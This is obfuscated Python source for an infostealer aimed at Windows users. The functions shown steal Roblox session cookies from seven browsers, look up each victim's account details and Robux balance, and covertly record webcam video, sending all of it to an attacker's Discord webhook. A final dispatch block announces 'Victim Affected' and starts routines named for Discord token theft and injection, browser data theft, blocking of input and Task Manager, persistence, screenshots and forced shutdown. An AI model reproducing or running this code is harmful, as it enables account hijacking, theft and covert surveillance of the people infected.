def R0b10x_C00ki3():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook, Embed
    import discord

    CISCFEHWKRUCBAOYAKSHHVJKERPZDRQPUOIOVZDMDSWZGHORCDWEVTJCESTTTEQZCNQOFSHECIWPWEXGTOQMVBOHUWDSZSSL = []
    def g3t_c00ki3_4nd_n4vig4t0r(RFHMMDVUOGDWPAPMQTRCISVIZZMNMSRQQQPOECVSLPDBJRWJTYIZLXWVSYKANJKIYGWUKNZTRL):
        try:
            v4r_c00kie5 = RFHMMDVUOGDWPAPMQTRCISVIZZMNMSRQQQPOECVSLPDBJRWJTYIZLXWVSYKANJKIYGWUKNZTRL()
            v4r_c00kie5 = str(v4r_c00kie5)
            v4r_c00kie = v4r_c00kie5.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            v4r_n4vigator = RFHMMDVUOGDWPAPMQTRCISVIZZMNMSRQQQPOECVSLPDBJRWJTYIZLXWVSYKANJKIYGWUKNZTRL.__name__
            return v4r_c00kie, v4r_n4vigator
        except:
            return None, None

    def Microsoft_Edge():
        return browser_cookie3.edge(domain_name="roblox.com")

    def Google_Chrome():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def Firefox():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def Opera():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def Opera_GX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def Safari():
        return browser_cookie3.safari(domain_name="roblox.com")

    def Brave():
        return browser_cookie3.brave(domain_name="roblox.com")

    NASAVPRSSVDSMCPKQIKUKIVTEDDWWSQKYNZJMKKMVWUCKFBIHPKUGM = [Microsoft_Edge, Google_Chrome, Firefox, Opera, Opera_GX, Safari, Brave]
    for v4r_br0ws3r in NASAVPRSSVDSMCPKQIKUKIVTEDDWWSQKYNZJMKKMVWUCKFBIHPKUGM:
        v4r_c00ki3, v4r_n4vigator = g3t_c00ki3_4nd_n4vig4t0r(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in CISCFEHWKRUCBAOYAKSHHVJKERPZDRQPUOIOVZDMDSWZGHORCDWEVTJCESTTTEQZCNQOFSHECIWPWEXGTOQMVBOHUWDSZSSL:
                CISCFEHWKRUCBAOYAKSHHVJKERPZDRQPUOIOVZDMDSWZGHORCDWEVTJCESTTTEQZCNQOFSHECIWPWEXGTOQMVBOHUWDSZSSL.append(v4r_c00ki3)
                try:
                    YOQSRMFSOXMIFUXAYDKYNDFCRPSAIWRUEHZUMJUZPOXYPFTZCRRYLGYDGSMTEQMFIZ = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG = json.loads(YOQSRMFSOXMIFUXAYDKYNDFCRPSAIWRUEHZUMJUZPOXYPFTZCRRYLGYDGSMTEQMFIZ.text)
                except:
                    pass

                SRDVOMLMGBNKCWIUQROQKVUXJMZOBOBUIGIXONMQVMRVUQATZVNYRHUQMPCQASQESTHGZPBNOZRBCSOYPUPTQHGDPCDKPFOFXK = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('id', "None")
                LOYHJLIHCEAIOXWLCPXLIFQSGPYOLUVPAYYMMDBBUGSBLOHULPRHDZLFZVVLB = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('displayName', "None")
                VBWKLUSYSKLAKXNMENQWIQVLLKXFMUVWGQEAZWLINYTIAJPBCOWWOOUJZCCJDEXTKUNIVAALEPHEFJJRNHBSP = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('name', "None")
                TVTZSMFDGSAEKGCNSMRTOELNXRLCWMPCGGEOCQSHBWPCWITEZDHPGSRAPETLGAYUCNGHRRIKERHTNYQM = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get("RobuxBalance", "None")
                GRKGOHWBPHZIRIVGJQDIOKGDZSHJUPGEKKSKMUJXLVMBJZXKMDJQTQKPKNCOJCTYMTDAJAEVHZHGNILRRWIWMBZYIIJ = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get("IsPremium", "None")
                SXDBYVPTSVGIDLHGTKTRGMFDAOPUGAWDFIGJRWTQATCNLUJAXDYQWJHYGPVKOWOLFHSKLXYDLJ = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get("ThumbnailUrl", "None")
                LOLMLIKOYGRDXRMBSQVCCRSOSMOUGDHMIAKFGBQBUNQQNJAROTMVNUVXXJRHKCMPBBZJMOAIPWHQGRV = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get("IsAnyBuildersClubMember", "None")
        
                LSKOWJMLISUPWKDYGFIRJEZCGFEEKLWPGOTEUUNWSOLMSYJVVLEWQHQDVQSXNILEBOEUZKWLDHREAMUNCWTQHHMTSZYIM = len(v4r_c00ki3)
                GMBBDREVHVINOVBPXQJWVIKUGRAFQMJXRXJGVLTCWOODOHUSNXNOYCSAPAHDQSWTI = LSKOWJMLISUPWKDYGFIRJEZCGFEEKLWPGOTEUUNWSOLMSYJVVLEWQHQDVQSXNILEBOEUZKWLDHREAMUNCWTQHHMTSZYIM // 2
                NNKCBJMFWNZUFVXYEKIBVXVKIMVKDFQZLOQXPZZRZFUUUUNKZWKHVGBJJBWZTRGRCRPRPTHGFYIRYFPSZQG = v4r_c00ki3[:GMBBDREVHVINOVBPXQJWVIKUGRAFQMJXRXJGVLTCWOODOHUSNXNOYCSAPAHDQSWTI]
                WXPIXWDAJWNTXKDFDZCVYRLDSMTKLSHZJMGWTEITZLVMCIBRUMUUVTJBHSYXMOMGFSWOOBOHMOVARO = v4r_c00ki3[GMBBDREVHVINOVBPXQJWVIKUGRAFQMJXRXJGVLTCWOODOHUSNXNOYCSAPAHDQSWTI:]

                IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER = SyncWebhook.from_url(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM)

                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV = discord.Embed(
                    title=f'Roblox Cookie `{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC} "{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}"`:',
                    color=DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL
                )
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.set_footer(text=UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC, icon_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.set_thumbnail(url=SXDBYVPTSVGIDLHGTKTRGMFDAOPUGAWDFIGJRWTQATCNLUJAXDYQWJHYGPVKOWOLFHSKLXYDLJ)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":compass: Navigator:", value=f"```{v4r_n4vigator}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":bust_in_silhouette: Username:", value=f"```{VBWKLUSYSKLAKXNMENQWIQVLLKXFMUVWGQEAZWLINYTIAJPBCOWWOOUJZCCJDEXTKUNIVAALEPHEFJJRNHBSP}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":bust_in_silhouette: DisplayName:", value=f"```{LOYHJLIHCEAIOXWLCPXLIFQSGPYOLUVPAYYMMDBBUGSBLOHULPRHDZLFZVVLB}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":robot: Id:", value=f"```{SRDVOMLMGBNKCWIUQROQKVUXJMZOBOBUIGIXONMQVMRVUQATZVNYRHUQMPCQASQESTHGZPBNOZRBCSOYPUPTQHGDPCDKPFOFXK}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":moneybag: Robux:", value=f"```{TVTZSMFDGSAEKGCNSMRTOELNXRLCWMPCGGEOCQSHBWPCWITEZDHPGSRAPETLGAYUCNGHRRIKERHTNYQM}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":tickets: Premium:", value=f"```{GRKGOHWBPHZIRIVGJQDIOKGDZSHJUPGEKKSKMUJXLVMBJZXKMDJQTQKPKNCOJCTYMTDAJAEVHZHGNILRRWIWMBZYIIJ}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":construction_site: Builders Club:", value=f"```{LOLMLIKOYGRDXRMBSQVCCRSOSMOUGDHMIAKFGBQBUNQQNJAROTMVNUVXXJRHKCMPBBZJMOAIPWHQGRV}```", inline=True)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":cookie: Cookie Part 1:", value=f"```{NNKCBJMFWNZUFVXYEKIBVXVKIMVKDFQZLOQXPZZRZFUUUUNKZWKHVGBJJBWZTRGRCRPRPTHGFYIRYFPSZQG}```", inline=False)
                UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.add_field(name=":cookie: Cookie Part 2:", value=f"```{WXPIXWDAJWNTXKDFDZCVYRLDSMTKLSHZJMGWTEITZLVMCIBRUMUUVTJBHSYXMOMGFSWOOBOHMOVARO}```", inline=False)

                IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER.send(embed=UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV, username=TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX,
                                avatar_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
                
    if not CISCFEHWKRUCBAOYAKSHHVJKERPZDRQPUOIOVZDMDSWZGHORCDWEVTJCESTTTEQZCNQOFSHECIWPWEXGTOQMVBOHUWDSZSSL:
        IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER = SyncWebhook.from_url(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM)
        UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV = Embed(
            title=f'Roblox Cookie `{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC} "{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}"`:', 
            description=f"No roblox cookie found.",
            color=DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL)
        UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.set_footer(text=UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC, icon_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
        IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER.send(embed=UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV, username=TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX, avatar_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)

def C4m3r4_C4ptur3():
    import os
    import cv2
    from discord import SyncWebhook, Embed, File
    from datetime import datetime

    try:
        from datetime import datetime
        OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ_file_capture = f"CameraCapture_{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC}.avi"
        WCZWGTVXDZKQXHDYIFKMDSMUUZDDUWTOCMRAZNODRCAGPNRSUYKGLATVYIRFFYHHIIUDZHTAYGIIRAKEKHQHSOOK = 10
        UKBRKILSWYTAGDEWSFSXSZFDWVXFPVZLNQUHNKTBBGGHTSQMWYULPJNDVYFGXTUCLM = cv2.VideoCapture(0)

        if not UKBRKILSWYTAGDEWSFSXSZFDWVXFPVZLNQUHNKTBBGGHTSQMWYULPJNDVYFGXTUCLM.isOpened():
            Clear()
            IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER = SyncWebhook.from_url(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM)
            UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV = Embed(
                title=f'Camera Capture `{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC} "{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}"`:', 
                description=f"No camera found.",
                color=DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL)
            UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.set_footer(text=UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC, icon_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
            IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER.send(embed=UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV, username=TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX, avatar_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)
            return

        def c4ptur3(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture):
            v4r_fourcc = cv2.VideoWriter_fourcc(*'XVID')
            v4r_out = cv2.VideoWriter(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture, v4r_fourcc, 20.0, (640, 480))
            v4r_time_start = datetime.now()
            Clear()
            while (datetime.now() - v4r_time_start).seconds < WCZWGTVXDZKQXHDYIFKMDSMUUZDDUWTOCMRAZNODRCAGPNRSUYKGLATVYIRFFYHHIIUDZHTAYGIIRAKEKHQHSOOK:
                Clear()
                v4r_ret, v4r_frame = UKBRKILSWYTAGDEWSFSXSZFDWVXFPVZLNQUHNKTBBGGHTSQMWYULPJNDVYFGXTUCLM.read()
                if not v4r_ret:
                    Clear()
                    break
                v4r_out.write(v4r_frame)

            UKBRKILSWYTAGDEWSFSXSZFDWVXFPVZLNQUHNKTBBGGHTSQMWYULPJNDVYFGXTUCLM.release()
            v4r_out.release()
            Clear()

        try:
            DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture = f"{os.path.join(os.environ.get('USERPROFILE'), 'Documents')}\\{OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ_file_capture}"
            c4ptur3(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture)
        except:
            DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture = OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ_file_capture
            c4ptur3(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture)

        UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV = Embed(title=f"Camera Capture `{YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC} \"{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}\"`:", color=DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL, description=f"```└── 📷 - {OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ_file_capture}```")
        UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV.set_footer(text=UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC, icon_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ)

        IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER = SyncWebhook.from_url(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM)
        with open(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture, "rb") as f:
            IOHIMDVCIQVFPNZGGUPAGGYCIYSKAJULBXNLUDKOOEKNWBTNPQJOEOPFYHNBITSGDJERCFHWEUANZAIRNOLROWIYFCSAZSIER.send(
                embed=UDCRUBYQGVPOCWAPLEQUHJCVSDSHYNIPKAABKILKATQPDOXYFZNXOZYIQOIDRWTGTCKFOGVCCSSQV,
                file=File(f, filename=OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ_file_capture),
                username=TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX,
                avatar_url=EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ
            )
            
        if os.path.exists(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture):
            os.remove(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ_file_capture)
        Clear()
    except:
        Clear()
        pass

try: requests.post(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX, 'avatar_url': EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM, json={'content': f'****╚══════════════════{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}══════════════════╝****', 'username': TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX, 'avatar_url': EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
